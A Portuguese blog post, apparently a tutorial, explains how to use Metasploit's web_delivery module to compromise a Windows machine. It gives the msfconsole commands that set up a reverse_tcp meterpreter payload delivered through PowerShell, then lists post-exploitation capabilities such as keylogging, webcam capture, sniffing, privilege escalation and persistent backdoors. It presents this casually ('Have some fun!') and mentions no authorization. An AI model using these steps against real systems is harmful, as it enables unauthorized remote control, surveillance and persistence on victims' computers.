Módulo Web Delivery do Metasploit

Muitas vezes estamos em situações em que temos acesso à uma máquina que precisamos explorar, mas sem as ferramentas adequadas ou necessárias naquele momento. Um dos módulos do Metasploit que pode nos ajudar em cenários assim é o web delivery, que permite que remotamente nos conectemos à um IP e tenhamos de retorno um shell, seja command.com ou meterpreter no caso do Metasploit.

Entretanto, é necessário que deixemos nossa máquina com o Metasploit (possivelmente na nuvem) já configurada aguardando a conexão.
Nesse exemplo, vamos ver como compromenter uma máquina Windows, entregando um shell meterpreter via PowerShell (poderia ser via Python ou PHP também).
Em primeiro lugar precisamos entrar no msfconsole e digitar os seguintes comandos:
  • use exploit/multi/script/web_delivery
  • set lhost [Kali IP Address]
  • set lport 4444
Quando digitamos o comando “show targets”, vemos as opções de entrega do shell, que em nosso caso será PowerShell:
Então, para selecionar o tipo de entrega e o shell que será entregue, digitamos os dois seguintes comandos:

 

  • set target 2
  • set payload windows/meterpreter/reverse_tcp
E então executamos o comando “exploit”, para colocar nossa máquina numa condição de “listening”, que é quando fica aguardando alguém conectar-se para entregar o payload:
E então, na máquina alvo, onde temos acesso físico, digitamos o comando abaixo para forçar a conexão e a entrega do payload:
E então, na máquina onde temos o Metasploit, veremos uma tentativa de conexão, e uma sessão sendo criada:
E então, ou você já terá um shell via meterpreter com o prompt “meterpreter>” aberto, ou simplesmente precisará digitar o comando “sessions -i [numero-da-sessão]” para conectar-se e começar a brincadeira.
A partir daí, terá todo o poder do meterpreter disponível em suas mãos: keylogger, screenshot, ativar webcam para vídeos e fotos, network sniffing, escalada de privilégios, criar backdoor persistente e etc. Quando quiser finalizar a sessão, basta digitar “exit” e cair de novo no msfconsole.
Have some fun!
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s